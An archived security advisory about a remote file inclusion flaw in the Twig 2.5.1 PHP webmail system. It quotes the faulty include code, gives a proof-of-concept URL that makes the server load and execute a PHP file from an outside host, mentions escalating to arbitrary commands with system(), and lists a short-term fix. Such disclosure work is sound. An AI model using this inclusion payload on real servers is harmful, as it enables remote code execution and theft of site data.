TUCoPS :: Web :: PHP :: twig.htm

Twig PHP Webmail System allows anyone to enter malicious data
Vulnerability

    Twig

Affected

    Twig 2.5.1

Description

    Joao  Gouveia  aka  Tharbad  found  following.   Twig is a popular
    webmail  system  written  in  PHP,    once  called  Muppet.    The
    possibility of processing our own php file , can leed to arbitrary
    command execution on the server as the httpd user.

    Twig is designed to allow the use of virtual hosting, unfortunatly
    the script that checks this fails to check for user suplied input,
    thus  allowing   anyone  to   submit  malicious   values  as   the
    configuration  directory.   The  faulty  piece  of  code  is   (in
    index.php3):

        // Allow for virtual hosting
         $config_dir = "config";
         if( $vhosts[$SERVER_NAME] )
        
        
            $config_dir = $vhosts[$SERVER_NAME];
            include( $config_dir . "/config.inc.php3" );
            include( $config_dir . "/images.inc.php3" );
          }

    If the  vhosts "directive"  is not  initialized, It  is trivial to
    exploit it.  Let's look at an example:
    1. We create  a config.inc.php3 script  with " <?  phpinfo(); ?> "
       in it, and upload it to some free web hosting service machine.
    2. We go to the vulnerable site using Twig and type in browser:

        http://twig.vuln.site/index.php3?vhosts[twig.vuln.site]=http://free.host.machine/~mydir/

    3. The script gladdly  includes _my_ config.inc.php3 and  executes
       it, presenting me with  the phpinfo relative to  the vulnerable
       site.

    You can surely imagine this danger, for example if the  vulnerable
    site has safe_mode  disable, we could  just use a  system($string)
    to execute arbitrary comands as the http user.

    Even if safe mode is  enabled, it's still possible to  execute our
    code, for things like revealing the source of php files, which may
    contain sensitive data in it.

    Note: this only works if our free web hosting doesn't process  the
    php3 file.

Solution

    Author(s) warned on  2000-11-13, the fix  will be included  on the
    next version.  As a short term fix try the following, simply add:

        unset($config);
        unset($vhosts);

    at the top of config/config.inc.php.

    Also add:

        unset($dbconfig);

    at the top of config/dbconfig.inc.php3 for good measure.

    Please note  that this  vulnerability is  only exploitable  if the
    URL  fopen  wrappers  functionality  is  compiled  in  (it  is  by
    default) and the  script isn't being  run on the  windows platform
    (Windows does not support Remote Files functionality in  include()
    statements).

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH